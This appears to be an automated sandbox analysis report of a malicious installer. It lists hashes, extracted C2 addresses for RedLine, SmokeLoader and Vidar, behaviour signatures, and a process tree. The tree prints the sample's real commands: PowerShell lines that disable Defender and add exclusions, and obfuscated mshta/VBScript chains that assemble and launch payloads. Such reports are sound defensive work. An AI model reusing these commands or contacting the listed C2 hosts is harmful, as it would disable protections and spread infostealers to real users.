Resubmissions

02-11-2021 06:54

211102-hpn1zsbhc2 10

02-11-2021 06:42

211102-hgpmjsgggp 10

01-11-2021 21:47

211101-1ncknsfgfm 10

Analysis

  • max time kernel
    2513s
  • max time network
    2619s
  • platform
    windows10_x64
  • resource
    win10-en-20210920
  • submitted
    02-11-2021 06:54

General

  • Target

    setup_x86_x64_install.exe

  • Size

    4.2MB

  • MD5

    b5b5fe52ed9ca7d47bfb857498fd684c

  • SHA1

    9c17089a630141c9b4e13ef46ab334d46709fdb8

  • SHA256

    6cbb4380d880c6bab221c81122b32e225ebf224942191fb08df5df82f971864b

  • SHA512

    482de7cacf73eb37050e323312b05d3d5d2152048efa5defa4b3d8687f6b3355233d8bf3f04d6107a7214f4b21e4f81f83313ecaf3bdcda98c7d95d60a41e79a

Malware Config

Extracted

Family

redline

Botnet

newjust

C2

135.181.129.119:4805

Extracted

Family

redline

Botnet

media0121

C2

91.121.67.60:23325

Extracted

Family

smokeloader

Version

2020

C2

http://brandyjaggers.com/upload/

http://andbal.com/upload/

http://alotofquotes.com/upload/

http://szpnc.cn/upload/

http://uggeboots.com/upload/

http://100klv.com/upload/

http://rapmusic.at/upload/

rc4.i32
rc4.i32

Extracted

Family

vidar

Version

41.6

Botnet

933

C2

https://mas.to/@lilocc

Attributes
  • profile_id

    933

Signatures

  • Formbook

    Formbook is a data stealing malware which is capable of stealing data.

  • Modifies Windows Defender Real-time Protection settings 3 TTPs
  • Process spawned unexpected child process 4 IoCs

    This typically indicates the parent process was compromised via an exploit or macro.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine Payload 4 IoCs
  • SmokeLoader

    Modular backdoor trojan in use since 2014.

  • Socelars

    Socelars is an infostealer targeting browser cookies and credit card credentials.

  • Socelars Payload 2 IoCs
  • Suspicious use of NtCreateProcessExOtherParentProcess 3 IoCs
  • Vidar

    Vidar is an infostealer based on Arkei stealer.

  • Checks for common network interception software 1 TTPs

    Looks in the registry for tools like Wireshark or Fiddler commonly used to analyze network activity.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
  • Vidar Stealer 2 IoCs
  • ASPack v2.12-2.42 7 IoCs

    Detects executables packed with ASPack v2.12-2.42

  • Adds policy Run key to start application 2 TTPs 2 IoCs
  • Blocklisted process makes network request 50 IoCs
  • Downloads MZ/PE file
  • Drops file in Drivers directory 1 IoCs
  • Executes dropped EXE 64 IoCs
  • Checks BIOS information in registry 2 TTPs 10 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 4 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Loads dropped DLL 64 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Accesses 2FA software files, possible credential harvesting 2 TTPs
  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 6 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 5 IoCs
  • Enumerates connected drives 3 TTPs 48 IoCs

    Attempts to read the root path of hard drives other than the default C: drive.

  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Looks up external IP address via web service 11 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Drops file in System32 directory 15 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 5 IoCs
  • Suspicious use of SetThreadContext 6 IoCs
  • Drops file in Program Files directory 18 IoCs
  • Drops file in Windows directory 54 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Program crash 22 IoCs
  • Checks SCSI registry key(s) 3 TTPs 18 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 4 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Delays execution with timeout.exe 1 IoCs
  • Kills process with taskkill 10 IoCs
  • Modifies Internet Explorer settings 1 TTPs 8 IoCs
  • Modifies data under HKEY_USERS 19 IoCs
  • Modifies registry class 64 IoCs
  • Modifies system certificate store 2 TTPs 8 IoCs
  • Script User-Agent 6 IoCs

    Uses user-agent string associated with script host/environment.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 2 IoCs
  • Suspicious behavior: MapViewOfSection 29 IoCs
  • Suspicious behavior: SetClipboardViewer 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 64 IoCs
  • Suspicious use of FindShellTrayWindow 9 IoCs
  • Suspicious use of SetWindowsHookEx 19 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s Schedule
    1⤵
    • Drops file in System32 directory
    PID:1040
    • C:\Users\Admin\AppData\Roaming\cjgwvcw
      C:\Users\Admin\AppData\Roaming\cjgwvcw
      2⤵
      • Checks SCSI registry key(s)
      • Suspicious behavior: MapViewOfSection
      PID:6036
    • C:\Users\Admin\AppData\Roaming\cjgwvcw
      C:\Users\Admin\AppData\Roaming\cjgwvcw
      2⤵
      • Checks SCSI registry key(s)
      • Suspicious behavior: MapViewOfSection
      PID:4396
    • C:\Users\Admin\AppData\Roaming\cjgwvcw
      C:\Users\Admin\AppData\Roaming\cjgwvcw
      2⤵
      • Checks SCSI registry key(s)
      • Suspicious behavior: MapViewOfSection
      PID:2184
    • C:\Users\Admin\AppData\Roaming\cjgwvcw
      C:\Users\Admin\AppData\Roaming\cjgwvcw
      2⤵
      • Checks SCSI registry key(s)
      • Suspicious behavior: MapViewOfSection
      PID:4968
  • c:\windows\system32\svchost.exe
    c:\windows\system32\svchost.exe -k netsvcs -s LanmanServer
    1⤵
      PID:2544
    • c:\windows\system32\svchost.exe
      c:\windows\system32\svchost.exe -k netsvcs -s IKEEXT
      1⤵
        PID:2528
      • c:\windows\system32\svchost.exe
        c:\windows\system32\svchost.exe -k netsvcs -s WpnService
        1⤵
          PID:2744
        • c:\windows\system32\svchost.exe
          c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
          1⤵
            PID:2736
          • C:\Windows\Explorer.EXE
            C:\Windows\Explorer.EXE
            1⤵
            • Drops file in Program Files directory
            • Drops file in Windows directory
            • Modifies registry class
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious behavior: GetForegroundWindowSpam
            • Suspicious use of AdjustPrivilegeToken
            • Suspicious use of FindShellTrayWindow
            • Suspicious use of SetWindowsHookEx
            PID:2872
            • C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe
              "C:\Users\Admin\AppData\Local\Temp\setup_x86_x64_install.exe"
              2⤵
              • Suspicious use of WriteProcessMemory
              PID:2832
              • C:\Users\Admin\AppData\Local\Temp\setup_installer.exe
                "C:\Users\Admin\AppData\Local\Temp\setup_installer.exe"
                3⤵
                • Executes dropped EXE
                • Suspicious use of WriteProcessMemory
                PID:2132
                • C:\Users\Admin\AppData\Local\Temp\7zS4589DED5\setup_install.exe
                  "C:\Users\Admin\AppData\Local\Temp\7zS4589DED5\setup_install.exe"
                  4⤵
                  • Executes dropped EXE
                  • Loads dropped DLL
                  • Suspicious use of WriteProcessMemory
                  PID:1352
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
                    5⤵
                    • Suspicious use of WriteProcessMemory
                    PID:3716
                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      powershell -inputformat none -outputformat none -NonInteractive -Command Set-MpPreference -DisableRealtimeMonitoring $true -SubmitSamplesConsent NeverSend -MAPSReporting Disable
                      6⤵
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:3312
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /c powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
                    5⤵
                    • Suspicious use of WriteProcessMemory
                    PID:2852
                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                      powershell -inputformat none -outputformat none -NonInteractive -Command Add-MpPreference -ExclusionPath "C:\Users\Admin\AppData\Local\Temp"
                      6⤵
                      • Suspicious behavior: EnumeratesProcesses
                      • Suspicious use of AdjustPrivilegeToken
                      PID:1640
                  • C:\Windows\SysWOW64\cmd.exe
                    C:\Windows\system32\cmd.exe /c Mon17870faab0.exe
                    5⤵
                    • Suspicious use of WriteProcessMemory
                    PID:1292
                    • C:\Users\Admin\AppData\Local\Temp\7zS4589DED5\Mon17870faab0.exe
                      Mon17870faab0.exe
                      6⤵
                      • Executes dropped EXE
                      • Suspicious use of AdjustPrivilegeToken
                      PID:1428
                      • C:\Windows\SysWOW64\cmd.exe
                        cmd.exe /c taskkill /f /im chrome.exe
                        7⤵
                          PID:2860
                          • C:\Windows\System32\Conhost.exe
                            \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                            8⤵
                              PID:5536
                            • C:\Windows\SysWOW64\taskkill.exe
                              taskkill /f /im chrome.exe
                              8⤵
                              • Kills process with taskkill
                              PID:3748
                      • C:\Windows\SysWOW64\cmd.exe
                        C:\Windows\system32\cmd.exe /c Mon178e7a516181.exe
                        5⤵
                        • Suspicious use of WriteProcessMemory
                        PID:4008
                        • C:\Users\Admin\AppData\Local\Temp\7zS4589DED5\Mon178e7a516181.exe
                          Mon178e7a516181.exe
                          6⤵
                          • Executes dropped EXE
                          PID:2460
                      • C:\Windows\SysWOW64\cmd.exe
                        C:\Windows\system32\cmd.exe /c Mon175e6c8b40064b8c8.exe
                        5⤵
                        • Suspicious use of WriteProcessMemory
                        PID:1672
                        • C:\Users\Admin\AppData\Local\Temp\7zS4589DED5\Mon175e6c8b40064b8c8.exe
                          Mon175e6c8b40064b8c8.exe
                          6⤵
                          • Executes dropped EXE
                          PID:1332
                          • C:\Windows\SysWOW64\mshta.exe
                            "C:\Windows\System32\mshta.exe" vBscRipT: ClOSe ( crEatEobJECt ( "wSCRIPT.SHEll" ). rUn ( "CMd.eXE /R tYpE ""C:\Users\Admin\AppData\Local\Temp\7zS4589DED5\Mon175e6c8b40064b8c8.exe"" > 6jZhRtW.EXe &&start 6jZHRTW.EXe /p5WmgTwUrhSt5mLQDQ6uTWAP3bAjNt & if """" == """" for %U In ( ""C:\Users\Admin\AppData\Local\Temp\7zS4589DED5\Mon175e6c8b40064b8c8.exe"" ) do taskkill -Im ""%~NxU"" -f " , 0 , tRUE ))
                            7⤵
                              PID:944
                              • C:\Windows\SysWOW64\cmd.exe
                                "C:\Windows\System32\cmd.exe" /R tYpE "C:\Users\Admin\AppData\Local\Temp\7zS4589DED5\Mon175e6c8b40064b8c8.exe" > 6jZhRtW.EXe &&start 6jZHRTW.EXe /p5WmgTwUrhSt5mLQDQ6uTWAP3bAjNt & if "" == "" for %U In ( "C:\Users\Admin\AppData\Local\Temp\7zS4589DED5\Mon175e6c8b40064b8c8.exe" ) do taskkill -Im "%~NxU" -f
                                8⤵
                                  PID:2380
                                  • C:\Users\Admin\AppData\Local\Temp\6jZhRtW.EXe
                                    6jZHRTW.EXe /p5WmgTwUrhSt5mLQDQ6uTWAP3bAjNt
                                    9⤵
                                    • Executes dropped EXE
                                    PID:2312
                                    • C:\Windows\SysWOW64\mshta.exe
                                      "C:\Windows\System32\mshta.exe" vBscRipT: ClOSe ( crEatEobJECt ( "wSCRIPT.SHEll" ). rUn ( "CMd.eXE /R tYpE ""C:\Users\Admin\AppData\Local\Temp\6jZhRtW.EXe"" > 6jZhRtW.EXe &&start 6jZHRTW.EXe /p5WmgTwUrhSt5mLQDQ6uTWAP3bAjNt & if ""/p5WmgTwUrhSt5mLQDQ6uTWAP3bAjNt "" == """" for %U In ( ""C:\Users\Admin\AppData\Local\Temp\6jZhRtW.EXe"" ) do taskkill -Im ""%~NxU"" -f " , 0 , tRUE ))
                                      10⤵
                                        PID:3216
                                        • C:\Windows\SysWOW64\cmd.exe
                                          "C:\Windows\System32\cmd.exe" /R tYpE "C:\Users\Admin\AppData\Local\Temp\6jZhRtW.EXe" > 6jZhRtW.EXe &&start 6jZHRTW.EXe /p5WmgTwUrhSt5mLQDQ6uTWAP3bAjNt & if "/p5WmgTwUrhSt5mLQDQ6uTWAP3bAjNt " == "" for %U In ( "C:\Users\Admin\AppData\Local\Temp\6jZhRtW.EXe" ) do taskkill -Im "%~NxU" -f
                                          11⤵
                                            PID:4352
                                        • C:\Windows\SysWOW64\mshta.exe
                                          "C:\Windows\System32\mshta.exe" vBsCrIpT: cLOse (CrEATEOBJECT ( "wScrIpT.ShelL" ). RUn ( "cMd /Q /R eCHO | SET /P = ""MZ"" > 1oZVDA.JaC & CoPy /y /b 1OZVDA.jAC + GjuW~.A +HPIuT6.AM + bDJeH5.9 yLIh.BIn & Del GJuW~.A HPIUT6.AM BDJEH5.9 1oZVDA.jaC& stArt regsvr32.exe /S YLIH.bIN " , 0 ,TRuE) )
                                          10⤵
                                            PID:4168
                                            • C:\Windows\SysWOW64\cmd.exe
                                              "C:\Windows\System32\cmd.exe" /Q /R eCHO | SET /P = "MZ" > 1oZVDA.JaC &CoPy /y /b 1OZVDA.jAC + GjuW~.A +HPIuT6.AM + bDJeH5.9 yLIh.BIn & Del GJuW~.A HPIUT6.AM BDJEH5.9 1oZVDA.jaC& stArt regsvr32.exe /S YLIH.bIN
                                              11⤵
                                                PID:2204
                                                • C:\Windows\SysWOW64\cmd.exe
                                                  C:\Windows\system32\cmd.exe /S /D /c" eCHO "
                                                  12⤵
                                                    PID:5504
                                                  • C:\Windows\SysWOW64\cmd.exe
                                                    C:\Windows\system32\cmd.exe /S /D /c" SET /P = "MZ" 1>1oZVDA.JaC"
                                                    12⤵
                                                      PID:5576
                                                    • C:\Windows\SysWOW64\regsvr32.exe
                                                      regsvr32.exe /S YLIH.bIN
                                                      12⤵
                                                        PID:5792
                                                • C:\Windows\SysWOW64\taskkill.exe
                                                  taskkill -Im "Mon175e6c8b40064b8c8.exe" -f
                                                  9⤵
                                                  • Kills process with taskkill
                                                  • Suspicious use of AdjustPrivilegeToken
                                                  PID:4284
                                        • C:\Windows\SysWOW64\cmd.exe
                                          C:\Windows\system32\cmd.exe /c Mon17bffc2992eb3d.exe /mixone
                                          5⤵
                                            PID:2920
                                            • C:\Users\Admin\AppData\Local\Temp\7zS4589DED5\Mon17bffc2992eb3d.exe
                                              Mon17bffc2992eb3d.exe /mixone
                                              6⤵
                                              • Executes dropped EXE
                                              PID:2260
                                              • C:\Windows\SysWOW64\WerFault.exe
                                                C:\Windows\SysWOW64\WerFault.exe -u -p 2260 -s 660
                                                7⤵
                                                • Program crash
                                                • Suspicious behavior: EnumeratesProcesses
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:4780
                                              • C:\Windows\SysWOW64\WerFault.exe
                                                C:\Windows\SysWOW64\WerFault.exe -u -p 2260 -s 676
                                                7⤵
                                                • Program crash
                                                • Suspicious behavior: EnumeratesProcesses
                                                • Suspicious use of AdjustPrivilegeToken
                                                PID:4952
                                              • C:\Windows\SysWOW64\WerFault.exe
                                                C:\Windows\SysWOW64\WerFault.exe -u -p 2260 -s 632
                                                7⤵
                                                • Program crash
                                                PID:628
                                              • C:\Windows\SysWOW64\WerFault.exe
                                                C:\Windows\SysWOW64\WerFault.exe -u -p 2260 -s 676
                                                7⤵
                                                • Program crash
                                                PID:3644
                                              • C:\Windows\SysWOW64\WerFault.exe
                                                C:\Windows\SysWOW64\WerFault.exe -u -p 2260 -s 884
                                                7⤵
                                                • Program crash
                                                PID:5952
                                              • C:\Windows\SysWOW64\WerFault.exe
                                                C:\Windows\SysWOW64\WerFault.exe -u -p 2260 -s 960
                                                7⤵
                                                • Program crash
                                                PID:2180
                                              • C:\Windows\SysWOW64\WerFault.exe
                                                C:\Windows\SysWOW64\WerFault.exe -u -p 2260 -s 1096
                                                7⤵
                                                • Suspicious use of NtCreateProcessExOtherParentProcess
                                                • Program crash
                                                PID:1084
                                          • C:\Windows\SysWOW64\cmd.exe
                                            C:\Windows\system32\cmd.exe /c Mon179f74c0ff3cf1f.exe
                                            5⤵
                                              PID:592
                                              • C:\Users\Admin\AppData\Local\Temp\7zS4589DED5\Mon179f74c0ff3cf1f.exe
                                                Mon179f74c0ff3cf1f.exe
                                                6⤵
                                                • Executes dropped EXE
                                                PID:3804
                                                • C:\Users\Admin\Pictures\Adobe Films\cxZAd24sUS7gnaZhGbDTtubW.exe
                                                  "C:\Users\Admin\Pictures\Adobe Films\cxZAd24sUS7gnaZhGbDTtubW.exe"
                                                  7⤵
                                                  • Executes dropped EXE
                                                  PID:5956
                                                • C:\Users\Admin\Pictures\Adobe Films\YjuzfHwI7DGMXPZxerTgO6hB.exe
                                                  "C:\Users\Admin\Pictures\Adobe Films\YjuzfHwI7DGMXPZxerTgO6hB.exe"
                                                  7⤵
                                                    PID:628
                                                    • C:\Users\Admin\Documents\RL4Wh104K1couOviUZS6GJSN.exe
                                                      "C:\Users\Admin\Documents\RL4Wh104K1couOviUZS6GJSN.exe"
                                                      8⤵
                                                        PID:4356
                                                        • C:\Users\Admin\Pictures\Adobe Films\TCScGMexoNz8gMzR6J5oOhTq.exe
                                                          "C:\Users\Admin\Pictures\Adobe Films\TCScGMexoNz8gMzR6J5oOhTq.exe"
                                                          9⤵
                                                          • Executes dropped EXE
                                                          PID:4560
                                                        • C:\Users\Admin\Pictures\Adobe Films\NR4zZ0JD8Z2L5ASIPfXO_c9X.exe
                                                          "C:\Users\Admin\Pictures\Adobe Films\NR4zZ0JD8Z2L5ASIPfXO_c9X.exe"
                                                          9⤵
                                                          • Executes dropped EXE
                                                          • Drops file in Program Files directory
                                                          • Suspicious use of AdjustPrivilegeToken
                                                          PID:628
                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 628 -s 656
                                                            10⤵
                                                            • Program crash
                                                            PID:3016
                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 628 -s 668
                                                            10⤵
                                                            • Program crash
                                                            PID:3960
                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 628 -s 780
                                                            10⤵
                                                            • Program crash
                                                            PID:1364
                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                            C:\Windows\SysWOW64\WerFault.exe -u -p 628 -s 824
                                                            10⤵
                                                            • Program crash
                                                            PID:5332
                                                        • C:\Users\Admin\Pictures\Adobe Films\gsuv7kniZqz31wLZk3X3Xoq6.exe
                                                          "C:\Users\Admin\Pictures\Adobe Films\gsuv7kniZqz31wLZk3X3Xoq6.exe"
                                                          9⤵
                                                            PID:3616
                                                            • C:\Windows\SysWOW64\cmd.exe
                                                              cmd.exe /c taskkill /f /im chrome.exe
                                                              10⤵
                                                                PID:2316
                                                                • C:\Windows\SysWOW64\taskkill.exe
                                                                  taskkill /f /im chrome.exe
                                                                  11⤵
                                                                  • Kills process with taskkill
                                                                  PID:1664
                                                            • C:\Users\Admin\Pictures\Adobe Films\1ooX_meFR_3Fg1p_015PLBTE.exe
                                                              "C:\Users\Admin\Pictures\Adobe Films\1ooX_meFR_3Fg1p_015PLBTE.exe"
                                                              9⤵
                                                              • Checks SCSI registry key(s)
                                                              • Suspicious behavior: MapViewOfSection
                                                              PID:4744
                                                            • C:\Users\Admin\Pictures\Adobe Films\EgvMHuER7zGqctoLtaKzw6GI.exe
                                                              "C:\Users\Admin\Pictures\Adobe Films\EgvMHuER7zGqctoLtaKzw6GI.exe"
                                                              9⤵
                                                                PID:5976
                                                              • C:\Users\Admin\Pictures\Adobe Films\khUeNobMfzHBr9MFcLyvhTYB.exe
                                                                "C:\Users\Admin\Pictures\Adobe Films\khUeNobMfzHBr9MFcLyvhTYB.exe"
                                                                9⤵
                                                                  PID:1344
                                                                  • C:\Windows\SysWOW64\mshta.exe
                                                                    "C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\Pictures\Adobe Films\khUeNobMfzHBr9MFcLyvhTYB.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If """" == """" for %M in ( ""C:\Users\Admin\Pictures\Adobe Films\khUeNobMfzHBr9MFcLyvhTYB.exe"" ) do taskkill -f -iM ""%~NxM"" " , 0 , truE ) )
                                                                    10⤵
                                                                      PID:4720
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        "C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\Pictures\Adobe Films\khUeNobMfzHBr9MFcLyvhTYB.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "" == "" for %M in ( "C:\Users\Admin\Pictures\Adobe Films\khUeNobMfzHBr9MFcLyvhTYB.exe" ) do taskkill -f -iM "%~NxM"
                                                                        11⤵
                                                                        • Blocklisted process makes network request
                                                                        • Executes dropped EXE
                                                                        PID:1408
                                                                        • C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe
                                                                          ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi
                                                                          12⤵
                                                                            PID:4672
                                                                            • C:\Windows\SysWOW64\mshta.exe
                                                                              "C:\Windows\System32\mshta.exe" vbsCrIPT:cLoSE( CrEaTeoBJeCt( "WscRIpT.sHElL" ). Run ( "cmd /R cOpY /Y ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If ""/PLQtzfgO0m8dRv4iYALOqi "" == """" for %M in ( ""C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe"" ) do taskkill -f -iM ""%~NxM"" " , 0 , truE ) )
                                                                              13⤵
                                                                                PID:5208
                                                                                • C:\Windows\SysWOW64\cmd.exe
                                                                                  "C:\Windows\System32\cmd.exe" /R cOpY /Y "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ..\kPBhgOaGQk.exe&& sTart ..\kPBhgOAGQK.ExE /PLQtzfgO0m8dRv4iYALOqi & If "/PLQtzfgO0m8dRv4iYALOqi " == "" for %M in ( "C:\Users\Admin\AppData\Local\Temp\kPBhgOaGQk.exe" ) do taskkill -f -iM "%~NxM"
                                                                                  14⤵
                                                                                  • Loads dropped DLL
                                                                                  PID:5320
                                                                              • C:\Windows\SysWOW64\mshta.exe
                                                                                "C:\Windows\System32\mshta.exe" VbScRIpt: CLosE ( cReAteobjEcT ( "wscRiPt.SheLl" ). RUn ( "C:\Windows\system32\cmd.exe /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~> TRMBiI66.CU & EcHo | Set /P = ""MZ"" > hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu + WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC " , 0, tRUE ) )
                                                                                13⤵
                                                                                  PID:4432
                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                    "C:\Windows\system32\cmd.exe" /R EcHO UwC:\Users\Admin\AppData\Local\TempNnML~> TRMBiI66.CU & EcHo | Set /P = "MZ" >hKS2IU.1Q & COPY /b /Y hKs2Iu.1Q + 9BU~.W + MyBa.V + 1W8lBDVH.AOu + WCWfZ1TN.MJ+ WCBG6.QA + tRMBII66.CU ..\LXQ2G.WC & Del /q *& starT msiexec -Y ..\lXQ2g.WC
                                                                                    14⤵
                                                                                      PID:516
                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                        C:\Windows\system32\cmd.exe /S /D /c" EcHo "
                                                                                        15⤵
                                                                                        • Blocklisted process makes network request
                                                                                        • Executes dropped EXE
                                                                                        • Suspicious use of AdjustPrivilegeToken
                                                                                        PID:3452
                                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                                        C:\Windows\system32\cmd.exe /S /D /c" Set /P = "MZ" 1>hKS2IU.1Q"
                                                                                        15⤵
                                                                                          PID:4880
                                                                                        • C:\Windows\SysWOW64\msiexec.exe
                                                                                          msiexec -Y ..\lXQ2g.WC
                                                                                          15⤵
                                                                                          • Loads dropped DLL
                                                                                          PID:1608
                                                                                  • C:\Windows\SysWOW64\taskkill.exe
                                                                                    taskkill -f -iM "khUeNobMfzHBr9MFcLyvhTYB.exe"
                                                                                    12⤵
                                                                                    • Kills process with taskkill
                                                                                    PID:2844
                                                                            • C:\Users\Admin\Pictures\Adobe Films\sfVIAWgnXsmR_2qA9CDaWfH0.exe
                                                                              "C:\Users\Admin\Pictures\Adobe Films\sfVIAWgnXsmR_2qA9CDaWfH0.exe"
                                                                              9⤵
                                                                                PID:4624
                                                                                • C:\Users\Admin\Pictures\Adobe Films\sfVIAWgnXsmR_2qA9CDaWfH0.exe
                                                                                  "C:\Users\Admin\Pictures\Adobe Films\sfVIAWgnXsmR_2qA9CDaWfH0.exe" -u
                                                                                  10⤵
                                                                                    PID:5092
                                                                                • C:\Users\Admin\Pictures\Adobe Films\J_CRSNe6PVBCyc8_O3mSeCxh.exe
                                                                                  "C:\Users\Admin\Pictures\Adobe Films\J_CRSNe6PVBCyc8_O3mSeCxh.exe"
                                                                                  9⤵
                                                                                    PID:3940
                                                                                    • C:\Users\Admin\AppData\Roaming\Calculator\setup.exe
                                                                                      C:\Users\Admin\AppData\Roaming\Calculator\setup.exe -cid= -sid= -silent=1
                                                                                      10⤵
                                                                                      • Loads dropped DLL
                                                                                      • Adds Run key to start application
                                                                                      PID:6096
                                                                                      • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                        "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" "--ZgwMku75"
                                                                                        11⤵
                                                                                          PID:4208
                                                                                          • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                            C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Calculator\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Calculator\User Data" --annotation=plat=Win64 --annotation=prod=Calculator --annotation=ver=0.0.13 --initial-client-data=0x1f8,0x1fc,0x200,0x1d4,0x204,0x7ffeb4a7dec0,0x7ffeb4a7ded0,0x7ffeb4a7dee0
                                                                                            12⤵
                                                                                              PID:6820
                                                                                            • C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe
                                                                                              "C:\Users\Admin\AppData\Roaming\Calculator\Calculator.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1632,4681294624424854142,16484598811080649894,131072 --lang=en-US --service-sandbox-type=network --no-sandbox --user-data-dir="C:\Users\Admin\AppData\Local\Calculator\User Data" --nwapp-path="C:\Users\Admin\AppData\Local\Temp\nw4208_1525738479" --mojo-platform-channel-handle=1652 /prefetch:8
                                                                                              12⤵
                                                                                                PID:7044
                                                                                        • C:\Users\Admin\Pictures\Adobe Films\9o26eRAQCw6NjP7nlg2LlzbX.exe
                                                                                          "C:\Users\Admin\Pictures\Adobe Films\9o26eRAQCw6NjP7nlg2LlzbX.exe"
                                                                                          9⤵
                                                                                            PID:3032
                                                                                            • C:\Users\Admin\AppData\Local\Temp\is-3RKF6.tmp\9o26eRAQCw6NjP7nlg2LlzbX.tmp
                                                                                              "C:\Users\Admin\AppData\Local\Temp\is-3RKF6.tmp\9o26eRAQCw6NjP7nlg2LlzbX.tmp" /SL5="$502C8,506127,422400,C:\Users\Admin\Pictures\Adobe Films\9o26eRAQCw6NjP7nlg2LlzbX.exe"
                                                                                              10⤵
                                                                                              • Loads dropped DLL
                                                                                              PID:784
                                                                                              • C:\Users\Admin\AppData\Local\Temp\is-QQ1D0.tmp\DYbALA.exe
                                                                                                "C:\Users\Admin\AppData\Local\Temp\is-QQ1D0.tmp\DYbALA.exe" /S /UID=2709
                                                                                                11⤵
                                                                                                • Drops file in Drivers directory
                                                                                                • Adds Run key to start application
                                                                                                • Drops file in Program Files directory
                                                                                                PID:5756
                                                                                                • C:\Program Files\Windows Mail\FDVZKUACFV\foldershare.exe
                                                                                                  "C:\Program Files\Windows Mail\FDVZKUACFV\foldershare.exe" /VERYSILENT
                                                                                                  12⤵
                                                                                                  • Suspicious behavior: GetForegroundWindowSpam
                                                                                                  PID:3616
                                                                                                • C:\Users\Admin\AppData\Local\Temp\29-13e53-7b3-ee599-a787b25d5930e\Migybicigae.exe
                                                                                                  "C:\Users\Admin\AppData\Local\Temp\29-13e53-7b3-ee599-a787b25d5930e\Migybicigae.exe"
                                                                                                  12⤵
                                                                                                  • Checks computer location settings
                                                                                                  PID:5092
                                                                                                • C:\Users\Admin\AppData\Local\Temp\e2-f8a1d-b87-592bf-4e5ff72574063\Faenicykezho.exe
                                                                                                  "C:\Users\Admin\AppData\Local\Temp\e2-f8a1d-b87-592bf-4e5ff72574063\Faenicykezho.exe"
                                                                                                  12⤵
